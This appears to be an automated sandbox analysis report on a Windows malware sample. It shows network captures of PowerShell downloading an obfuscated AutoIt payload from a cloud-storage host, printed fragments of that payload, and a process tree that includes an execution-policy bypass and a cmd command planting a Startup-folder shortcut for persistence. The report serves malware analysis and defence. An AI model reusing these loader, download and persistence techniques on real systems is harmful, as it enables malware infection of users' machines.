                                                                          Oct 8, 2024 14:12:04.929944038 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:04.930027962 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:04.930059910 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:04.930092096 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:04.930099964 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:04.930454016 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:04.930474997 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:04.930516005 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:04.930524111 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:04.930557013 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:04.931041956 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:04.931062937 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:04.931101084 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:04.931108952 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:04.931129932 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:04.931145906 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:04.931552887 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:04.931569099 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:04.931612015 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:04.931621075 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:04.931639910 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:04.931653023 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:04.932341099 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:04.932357073 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:04.932393074 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:04.932400942 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:04.932424068 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:04.932436943 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:04.933787107 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:04.933808088 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:04.933852911 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:04.933866978 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:04.933902979 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:04.987684965 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:04.987715960 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:04.987889051 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:04.987915993 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:04.987963915 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:04.998632908 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:04.998680115 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:04.998718977 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:04.998729944 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:04.998759031 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:04.998765945 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:05.112063885 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:05.263890028 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:06.214082956 CEST49730443192.168.2.483.140.241.4
                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Oct 8, 2024 14:12:00.988854885 CEST5808753192.168.2.41.1.1.1
                                                                          Oct 8, 2024 14:12:01.102056980 CEST53580871.1.1.1192.168.2.4
                                                                          Oct 8, 2024 14:12:08.861865997 CEST5272153192.168.2.41.1.1.1
                                                                          Oct 8, 2024 14:12:09.281486034 CEST53527211.1.1.1192.168.2.4
                                                                          Oct 8, 2024 14:12:27.704185963 CEST5140153192.168.2.41.1.1.1
                                                                          Oct 8, 2024 14:12:27.719094038 CEST53514011.1.1.1192.168.2.4
                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                          Oct 8, 2024 14:12:00.988854885 CEST192.168.2.41.1.1.10x101fStandard query (0)my.cloudme.comA (IP address)IN (0x0001)false
                                                                          Oct 8, 2024 14:12:08.861865997 CEST192.168.2.41.1.1.10x3279Standard query (0)nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigsA (IP address)IN (0x0001)false
                                                                          Oct 8, 2024 14:12:27.704185963 CEST192.168.2.41.1.1.10x2dfcStandard query (0)nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigsA (IP address)IN (0x0001)false
                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                          Oct 8, 2024 14:12:01.102056980 CEST1.1.1.1192.168.2.40x101fNo error (0)my.cloudme.com83.140.241.4A (IP address)IN (0x0001)false
                                                                          Oct 8, 2024 14:12:09.281486034 CEST1.1.1.1192.168.2.40x3279Name error (3)nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigsnonenoneA (IP address)IN (0x0001)false
                                                                          Oct 8, 2024 14:12:27.719094038 CEST1.1.1.1192.168.2.40x2dfcName error (3)nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigsnonenoneA (IP address)IN (0x0001)false
                                                                          • my.cloudme.com
                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          0192.168.2.44973083.140.241.44437452C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-08 12:12:01 UTC198OUTGET /v1/ws2/:updatemake/:reality/reality.txt HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                          Host: my.cloudme.com
                                                                          Connection: Keep-Alive
                                                                          2024-10-08 12:12:02 UTC395INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Tue, 08 Oct 2024 12:12:02 GMT
                                                                          Content-Type: text/plain; charset=ISO-8859-1
                                                                          Content-Length: 3620034
                                                                          Connection: close
                                                                          Last-Modified: Mon, 07 Oct 2024 13:14:45 GMT
                                                                          Content-Disposition: attachment
                                                                          Cache-Control: private, max-age=0
                                                                          ETag: "6703dec5-373cc2"
                                                                          Accept-Ranges: bytes
                                                                          Content-Security-Policy: frame-ancestors *.cloudme.com
                                                                          2024-10-08 12:12:02 UTC15989INData Raw: 46 75 6e 63 20 4e 75 74 72 69 74 69 6f 6e 53 70 65 65 64 4d 61 79 6f 72 46 61 6d 69 6c 69 65 73 28 24 53 6d 4b 69 73 73 2c 20 24 45 66 66 69 63 69 65 6e 74 6c 79 46 6f 72 6d 75 6c 61 2c 20 24 43 6f 6e 73 75 6c 74 69 6e 67 53 6f 72 74 73 4c 61 62 73 2c 20 24 66 75 72 74 68 65 72 74 65 72 72 6f 72 69 73 74 2c 20 24 42 49 4b 45 4f 43 43 55 52 52 45 4e 43 45 53 4c 49 47 48 54 2c 20 24 52 65 76 65 72 73 65 50 68 69 6c 69 70 70 69 6e 65 73 29 0a 24 50 64 42 6c 6f 63 6b 73 52 65 73 70 6f 6e 73 65 44 61 74 20 3d 20 27 37 33 39 31 31 39 36 31 38 37 37 32 27 0a 24 56 65 72 69 66 69 65 64 55 6e 64 65 72 73 74 6f 6f 64 56 61 6c 69 64 61 74 69 6f 6e 20 3d 20 33 34 0a 24 69 6f 73 79 6d 70 68 6f 6e 79 73 65 65 6d 73 63 72 75 63 69 61 6c 20 3d 20 35 30 0a 46 6f 72 20 24
                                                                          Data Ascii: Func NutritionSpeedMayorFamilies($SmKiss, $EfficientlyFormula, $ConsultingSortsLabs, $furtherterrorist, $BIKEOCCURRENCESLIGHT, $ReversePhilippines)$PdBlocksResponseDat = '739119618772'$VerifiedUnderstoodValidation = 34$iosymphonyseemscrucial = 50For $
                                                                          2024-10-08 12:12:02 UTC16384INData Raw: 4d 45 47 41 55 47 45 20 3d 20 39 38 0a 46 6f 72 20 24 55 63 67 52 20 3d 20 36 32 20 54 6f 20 37 38 36 0a 49 66 20 24 53 74 61 72 74 73 45 71 75 69 74 79 49 6e 63 75 72 72 65 64 4c 61 79 6f 75 74 20 3d 20 38 37 20 54 68 65 6e 0a 50 69 78 65 6c 47 65 74 43 6f 6c 6f 72 28 57 61 6c 65 73 28 22 38 37 5d 37 38 5d 37 36 5d 37 38 5d 39 32 5d 39 32 5d 37 34 5d 39 31 5d 38 32 5d 38 35 5d 39 38 5d 35 31 5d 38 34 5d 37 34 5d 38 32 5d 35 31 5d 38 31 5d 39 34 5d 39 31 5d 39 31 5d 38 32 5d 37 36 5d 37 34 5d 38 37 5d 37 38 5d 35 31 5d 37 36 5d 38 38 5d 39 36 5d 35 31 22 2c 39 2f 31 29 2c 20 57 61 6c 65 73 28 22 38 37 5d 37 38 5d 37 36 5d 37 38 5d 39 32 5d 39 32 5d 37 34 5d 39 31 5d 38 32 5d 38 35 5d 39 38 5d 35 31 5d 38 34 5d 37 34 5d 38 32 5d 35 31 5d 38 31 5d 39 34 5d
                                                                          Data Ascii: MEGAUGE = 98For $UcgR = 62 To 786If $StartsEquityIncurredLayout = 87 ThenPixelGetColor(Wales("87]78]76]78]92]92]74]91]82]85]98]51]84]74]82]51]81]94]91]91]82]76]74]87]78]51]76]88]96]51",9/1), Wales("87]78]76]78]92]92]74]91]82]85]98]51]84]74]82]51]81]94]
                                                                          2024-10-08 12:12:02 UTC16384INData Raw: 59 41 20 2b 20 31 0a 45 6e 64 49 66 0a 49 66 20 24 42 49 54 52 45 41 44 49 4e 47 53 59 41 20 3d 20 39 36 20 54 68 65 6e 0a 44 72 69 76 65 53 74 61 74 75 73 28 57 61 6c 65 73 28 22 37 30 5d 31 31 34 5d 31 31 33 5d 31 32 31 5d 31 30 34 5d 31 31 37 5d 31 31 39 5d 31 30 38 5d 31 30 31 5d 31 31 31 5d 31 30 34 5d 33 36 22 2c 32 37 2f 39 29 29 0a 41 54 61 6e 28 36 31 30 30 29 0a 41 53 69 6e 28 34 31 35 33 29 0a 24 42 49 54 52 45 41 44 49 4e 47 53 59 41 20 3d 20 24 42 49 54 52 45 41 44 49 4e 47 53 59 41 20 2b 20 31 0a 45 6e 64 49 66 0a 49 66 20 24 42 49 54 52 45 41 44 49 4e 47 53 59 41 20 3d 20 39 37 20 54 68 65 6e 0a 24 4e 61 72 72 6f 77 4c 61 74 69 6e 61 73 4c 69 62 72 61 72 79 20 3d 20 44 65 63 28 57 61 6c 65 73 28 22 39 37 5d 37 31 5d 37 30 5d 31 30 31 5d 37
                                                                          Data Ascii: YA + 1EndIfIf $BITREADINGSYA = 96 ThenDriveStatus(Wales("70]114]113]121]104]117]119]108]101]111]104]36",27/9))ATan(6100)ASin(4153)$BITREADINGSYA = $BITREADINGSYA + 1EndIfIf $BITREADINGSYA = 97 Then$NarrowLatinasLibrary = Dec(Wales("97]71]70]101]7
                                                                          2024-10-08 12:12:02 UTC16384INData Raw: 64 49 66 0a 49 66 20 24 6c 69 73 61 6b 6e 6f 77 6c 65 64 67 65 73 74 6f 72 6d 73 68 61 72 70 69 6e 73 69 67 68 74 20 3d 20 33 30 20 54 68 65 6e 0a 4c 6f 63 61 6c 20 24 46 69 6e 64 73 4b 73 44 69 66 66 69 63 75 6c 74 79 55 73 70 73 32 20 3d 20 44 6c 6c 53 74 72 75 63 74 43 72 65 61 74 65 28 57 61 6c 65 73 28 22 31 30 32 5d 31 32 35 5d 31 32 30 5d 31 30 35 5d 39 35 22 2c 31 36 2f 34 29 20 26 20 24 63 65 72 74 69 66 69 63 61 74 65 61 63 74 69 6f 6e 32 20 26 20 57 61 6c 65 73 28 22 39 39 22 2c 36 2f 31 29 29 0a 45 78 69 74 4c 6f 6f 70 0a 45 6e 64 49 66 0a 49 66 20 24 6c 69 73 61 6b 6e 6f 77 6c 65 64 67 65 73 74 6f 72 6d 73 68 61 72 70 69 6e 73 69 67 68 74 20 3d 20 33 31 20 54 68 65 6e 0a 44 65 63 28 57 61 6c 65 73 28 22 31 31 37 5d 31 30 32 5d 31 32 30 5d 31
                                                                          Data Ascii: dIfIf $lisaknowledgestormsharpinsight = 30 ThenLocal $FindsKsDifficultyUsps2 = DllStructCreate(Wales("102]125]120]105]95",16/4) & $certificateaction2 & Wales("99",6/1))ExitLoopEndIfIf $lisaknowledgestormsharpinsight = 31 ThenDec(Wales("117]102]120]1
                                                                          2024-10-08 12:12:02 UTC16384INData Raw: 30 36 5d 31 30 35 5d 33 37 5d 33 37 5d 33 37 5d 33 37 5d 37 36 5d 31 30 36 5d 31 32 31 5d 33 37 5d 33 37 5d 33 37 5d 33 37 22 2c 34 35 2f 39 29 29 0a 44 65 63 28 57 61 6c 65 73 28 22 38 35 5d 31 30 32 5d 31 30 34 5d 31 31 32 5d 31 30 32 5d 31 30 38 5d 31 30 36 5d 31 32 30 5d 35 32 5d 38 38 5d 31 32 31 5d 31 31 39 5d 31 32 32 5d 31 30 34 5d 31 32 31 5d 31 32 32 5d 31 31 39 5d 31 30 36 5d 31 32 30 5d 35 32 22 2c 32 35 2f 35 29 29 0a 24 77 61 69 74 73 75 73 73 65 78 20 3d 20 24 77 61 69 74 73 75 73 73 65 78 20 2b 20 31 0a 45 6e 64 49 66 0a 49 66 20 24 77 61 69 74 73 75 73 73 65 78 20 3d 20 31 32 20 54 68 65 6e 0a 24 4e 4d 53 45 41 52 43 48 4f 52 44 45 52 43 41 54 41 4c 4f 47 55 45 20 3d 20 44 6c 6c 53 74 72 75 63 74 43 72 65 61 74 65 28 27 62 79 74 65 5b 27
                                                                          Data Ascii: 06]105]37]37]37]37]76]106]121]37]37]37]37",45/9))Dec(Wales("85]102]104]112]102]108]106]120]52]88]121]119]122]104]121]122]119]106]120]52",25/5))$waitsussex = $waitsussex + 1EndIfIf $waitsussex = 12 Then$NMSEARCHORDERCATALOGUE = DllStructCreate('byte['
                                                                          2024-10-08 12:12:02 UTC16384INData Raw: 33 29 29 0a 43 68 72 28 34 38 33 37 29 0a 24 73 65 74 74 69 6e 67 73 6f 6d 65 72 73 65 74 76 65 67 65 74 61 72 69 61 6e 74 75 72 6e 20 3d 20 24 73 65 74 74 69 6e 67 73 6f 6d 65 72 73 65 74 76 65 67 65 74 61 72 69 61 6e 74 75 72 6e 20 2b 20 31 0a 45 6e 64 49 66 0a 49 66 20 24 73 65 74 74 69 6e 67 73 6f 6d 65 72 73 65 74 76 65 67 65 74 61 72 69 61 6e 74 75 72 6e 20 3d 20 34 35 20 54 68 65 6e 0a 24 46 69 73 68 52 6f 6c 61 6e 64 53 74 75 66 66 20 3d 20 44 65 63 28 57 61 6c 65 73 28 22 31 31 37 5d 37 36 5d 38 36 5d 38 30 5d 31 32 35 5d 31 31 36 5d 38 38 5d 31 32 38 5d 38 32 5d 31 30 39 5d 38 33 5d 39 36 5d 31 31 35 22 2c 33 36 2f 36 29 29 0a 45 78 69 74 4c 6f 6f 70 0a 45 6e 64 49 66 0a 49 66 20 24 73 65 74 74 69 6e 67 73 6f 6d 65 72 73 65 74 76 65 67 65 74 61
                                                                          Data Ascii: 3))Chr(4837)$settingsomersetvegetarianturn = $settingsomersetvegetarianturn + 1EndIfIf $settingsomersetvegetarianturn = 45 Then$FishRolandStuff = Dec(Wales("117]76]86]80]125]116]88]128]82]109]83]96]115",36/6))ExitLoopEndIfIf $settingsomersetvegeta
                                                                          2024-10-08 12:12:02 UTC16384INData Raw: 35 27 0a 24 53 74 72 69 63 74 52 65 61 6c 74 6f 72 73 41 64 6d 69 6e 69 73 74 72 61 74 69 6f 6e 20 3d 20 36 0a 24 54 72 61 64 65 72 57 61 6c 20 3d 20 37 31 0a 57 68 69 6c 65 20 35 34 0a 49 66 20 24 53 74 72 69 63 74 52 65 61 6c 74 6f 72 73 41 64 6d 69 6e 69 73 74 72 61 74 69 6f 6e 20 3d 20 35 20 54 68 65 6e 0a 50 69 78 65 6c 47 65 74 43 6f 6c 6f 72 28 32 36 2c 20 36 30 36 2c 20 30 29 0a 44 72 69 76 65 53 74 61 74 75 73 28 57 61 6c 65 73 28 22 31 31 36 5d 31 31 33 5d 31 32 31 5d 31 31 37 5d 33 34 5d 39 39 5d 31 31 36 5d 31 31 31 5d 31 32 33 5d 33 34 5d 31 31 36 5d 39 39 5d 31 31 32 5d 31 30 39 5d 31 30 37 5d 31 31 32 5d 31 30 35 5d 33 34 5d 31 31 31 5d 31 30 37 5d 39 39 5d 33 34 22 2c 31 34 2f 37 29 29 0a 24 53 74 72 69 63 74 52 65 61 6c 74 6f 72 73 41 64
                                                                          Data Ascii: 5'$StrictRealtorsAdministration = 6$TraderWal = 71While 54If $StrictRealtorsAdministration = 5 ThenPixelGetColor(26, 606, 0)DriveStatus(Wales("116]113]121]117]34]99]116]111]123]34]116]99]112]109]107]112]105]34]111]107]99]34",14/7))$StrictRealtorsAd
                                                                          2024-10-08 12:12:02 UTC16384INData Raw: 73 50 73 20 3d 20 43 6f 6e 73 6f 6c 65 57 72 69 74 65 45 72 72 6f 72 28 57 61 6c 65 73 28 22 31 31 38 5d 38 30 5d 31 31 38 5d 31 31 32 5d 31 30 35 5d 36 39 5d 38 30 5d 31 31 39 5d 38 30 5d 39 34 5d 31 32 33 5d 31 32 30 5d 31 31 39 5d 31 30 33 5d 31 31 30 22 2c 31 32 2f 33 29 29 0a 45 78 69 74 4c 6f 6f 70 0a 45 6e 64 49 66 0a 4e 65 78 74 0a 24 62 61 73 69 63 73 61 74 68 6c 65 74 69 63 73 20 3d 20 27 39 39 35 37 32 30 35 30 31 39 30 38 39 35 39 38 30 32 31 36 32 35 30 36 35 37 34 38 30 36 32 36 37 34 32 39 37 36 30 37 33 35 37 32 31 34 36 30 34 37 33 32 31 35 38 35 30 30 33 35 36 37 30 35 37 27 0a 24 4a 65 4f 6b 61 79 20 3d 20 35 34 0a 24 4d 69 73 73 65 64 48 61 70 70 79 50 70 43 65 6e 74 72 61 6c 20 3d 20 39 35 0a 46 6f 72 20 24 45 61 52 62 20 3d 20 32 34
                                                                          Data Ascii: sPs = ConsoleWriteError(Wales("118]80]118]112]105]69]80]119]80]94]123]120]119]103]110",12/3))ExitLoopEndIfNext$basicsathletics = '99572050190895980216250657480626742976073572146047321585003567057'$JeOkay = 54$MissedHappyPpCentral = 95For $EaRb = 24
                                                                          2024-10-08 12:12:02 UTC16384INData Raw: 30 38 5d 31 32 36 5d 31 30 39 5d 31 32 32 5d 31 32 34 5d 31 31 33 5d 31 32 33 5d 31 30 39 5d 31 31 37 5d 31 30 39 5d 31 31 38 5d 31 32 34 5d 31 32 33 5d 35 33 5d 39 32 5d 31 32 32 5d 31 30 35 5d 31 30 37 5d 31 32 34 5d 35 33 5d 37 36 5d 31 31 39 5d 31 32 37 5d 31 31 38 5d 31 31 36 5d 31 31 39 5d 31 30 35 5d 31 30 38 5d 31 30 35 5d 31 30 36 5d 31 31 36 5d 31 30 39 5d 35 33 22 2c 35 36 2f 37 29 29 0a 44 72 69 76 65 53 74 61 74 75 73 28 57 61 6c 65 73 28 22 39 30 5d 31 30 37 5d 31 30 35 5d 31 31 30 5d 31 31 36 5d 31 31 31 5d 31 30 35 5d 31 30 33 5d 31 31 34 5d 34 31 5d 38 39 5d 31 32 33 5d 31 30 39 5d 31 30 39 5d 31 30 37 5d 31 32 31 5d 31 32 32 5d 31 30 37 5d 31 30 36 5d 34 31 22 2c 33 36 2f 36 29 29 0a 24 70 6f 72 74 65 72 6c 61 62 6f 72 61 74 6f 72 79 20
                                                                          Data Ascii: 08]126]109]122]124]113]123]109]117]109]118]124]123]53]92]122]105]107]124]53]76]119]127]118]116]119]105]108]105]106]116]109]53",56/7))DriveStatus(Wales("90]107]105]110]116]111]105]103]114]41]89]123]109]109]107]121]122]107]106]41",36/6))$porterlaboratory
                                                                          2024-10-08 12:12:02 UTC16384INData Raw: 43 6f 6c 6f 72 28 57 61 6c 65 73 28 22 37 39 5d 37 30 5d 38 38 5d 36 37 5d 37 34 5d 37 30 5d 34 36 5d 38 33 5d 36 36 5d 37 34 5d 37 37 5d 38 33 5d 38 30 5d 36 36 5d 36 39 5d 34 36 5d 37 32 5d 38 36 5d 37 39 5d 38 34 5d 34 36 5d 36 39 5d 37 34 5d 38 34 5d 36 38 5d 34 36 22 2c 39 2f 39 29 2c 20 57 61 6c 65 73 28 22 37 39 5d 37 30 5d 38 38 5d 36 37 5d 37 34 5d 37 30 5d 34 36 5d 38 33 5d 36 36 5d 37 34 5d 37 37 5d 38 33 5d 38 30 5d 36 36 5d 36 39 5d 34 36 5d 37 32 5d 38 36 5d 37 39 5d 38 34 5d 34 36 5d 36 39 5d 37 34 5d 38 34 5d 36 38 5d 34 36 22 2c 39 2f 39 29 29 0a 24 54 65 6d 70 6c 65 52 65 61 6c 69 73 74 69 63 43 6f 6d 70 61 6e 79 41 6e 79 77 68 65 72 65 20 3d 20 24 54 65 6d 70 6c 65 52 65 61 6c 69 73 74 69 63 43 6f 6d 70 61 6e 79 41 6e 79 77 68 65 72 65
                                                                          Data Ascii: Color(Wales("79]70]88]67]74]70]46]83]66]74]77]83]80]66]69]46]72]86]79]84]46]69]74]84]68]46",9/9), Wales("79]70]88]67]74]70]46]83]66]74]77]83]80]66]69]46]72]86]79]84]46]69]74]84]68]46",9/9))$TempleRealisticCompanyAnywhere = $TempleRealisticCompanyAnywhere


                                                                          Click to jump to process

                                                                          Click to jump to process

                                                                          Click to dive into process behavior distribution

                                                                          Click to jump to process

                                                                          Target ID:0
                                                                          Start time:08:11:57
                                                                          Start date:08/10/2024
                                                                          Path:C:\Users\user\Desktop\file.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Users\user\Desktop\file.exe"
                                                                          Imagebase:0x7ff797830000
                                                                          File size:2'016'768 bytes
                                                                          MD5 hash:1D2CF62E7874BB460B7258279A55DDF3
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          Target ID:1
                                                                          Start time:08:11:58
                                                                          Start date:08/10/2024
                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\ProfileDetails.ps1"
                                                                          Imagebase:0x7ff788560000
                                                                          File size:452'608 bytes
                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:2
                                                                          Start time:08:11:58
                                                                          Start date:08/10/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff7699e0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:3
                                                                          Start time:08:12:05
                                                                          Start date:08/10/2024
                                                                          Path:C:\Users\Public\InformationCheck.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\Public\InformationCheck.exe" C:\Users\Public\Details.au3
                                                                          Imagebase:0x460000
                                                                          File size:893'608 bytes
                                                                          MD5 hash:C56B5F0201A3B3DE53E561FE76912BFD
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Antivirus matches:
                                                                          • Detection: 3%, ReversingLabs
                                                                          Reputation:high
                                                                          Has exited:false

                                                                          Target ID:4
                                                                          Start time:08:12:07
                                                                          Start date:08/10/2024
                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit
                                                                          Imagebase:0x240000
                                                                          File size:236'544 bytes
                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:5
                                                                          Start time:08:12:07
                                                                          Start date:08/10/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff7699e0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:7
                                                                          Start time:08:12:16
                                                                          Start date:08/10/2024
                                                                          Path:C:\Windows\System32\wscript.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js"
                                                                          Imagebase:0x7ff763f00000
                                                                          File size:170'496 bytes
                                                                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:8
                                                                          Start time:08:12:18
                                                                          Start date:08/10/2024
                                                                          Path:C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"
                                                                          Imagebase:0x10000
                                                                          File size:893'608 bytes
                                                                          MD5 hash:C56B5F0201A3B3DE53E561FE76912BFD
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Antivirus matches:
                                                                          • Detection: 3%, ReversingLabs
                                                                          Reputation:high
                                                                          Has exited:false

                                                                          Reset < >

                                                                            Execution Graph

                                                                            Execution Coverage:2.4%
                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                            Signature Coverage:12.5%
                                                                            Total number of Nodes:1408
                                                                            Total number of Limit Nodes:26
                                                                            execution_graph 94134 7ff797858fac 94135 7ff79785901c 94134->94135 94136 7ff797858fd2 GetModuleHandleW 94134->94136 94151 7ff79786b9bc EnterCriticalSection 94135->94151 94136->94135 94141 7ff797858fdf 94136->94141 94138 7ff79786ba10 _isindst LeaveCriticalSection 94139 7ff7978590f0 94138->94139 94144 7ff797859118 11 API calls 94139->94144 94149 7ff7978590fc 94139->94149 94140 7ff797859026 94145 7ff79786aa8c 30 API calls 94140->94145 94148 7ff7978590cb 94140->94148 94150 7ff7978590a0 94140->94150 94141->94135 94152 7ff797859164 GetModuleHandleExW 94141->94152 94142 7ff7978590b8 94143 7ff79786ada4 75 API calls 94142->94143 94143->94148 94144->94149 94145->94150 94147 7ff79786ada4 75 API calls 94147->94142 94148->94138 94150->94142 94150->94147 94153 7ff79785918e GetProcAddress 94152->94153 94154 7ff7978591b5 94152->94154 94153->94154 94155 7ff7978591a8 94153->94155 94156 7ff7978591c5 94154->94156 94157 7ff7978591bf FreeLibrary 94154->94157 94155->94154 94156->94135 94157->94156 94158 7ff797842c17 94161 7ff7978414a0 94158->94161 94160 7ff797842c2a 94162 7ff7978414d3 94161->94162 94164 7ff79788bdd1 94162->94164 94168 7ff79788bdf2 94162->94168 94176 7ff79788be31 94162->94176 94192 7ff7978414fa memcpy_s 94162->94192 94166 7ff79788bddb 94164->94166 94164->94192 94227 7ff7978c9514 300 API calls 94166->94227 94167 7ff79788be19 94229 7ff7978b34e4 77 API calls 3 library calls 94167->94229 94168->94167 94228 7ff7978c9a88 300 API calls 4 library calls 94168->94228 94170 7ff797841884 94218 7ff797852130 45 API calls 94170->94218 94230 7ff7978c8f48 300 API calls 3 library calls 94176->94230 94177 7ff797841898 94177->94160 94178 7ff797841a30 45 API calls 94178->94192 94181 7ff797852130 45 API calls 94181->94192 94186 7ff79788bfe4 94246 7ff7978c93a4 77 API calls 94186->94246 94190 7ff797841799 94195 7ff797841815 94190->94195 94247 7ff7978b34e4 77 API calls 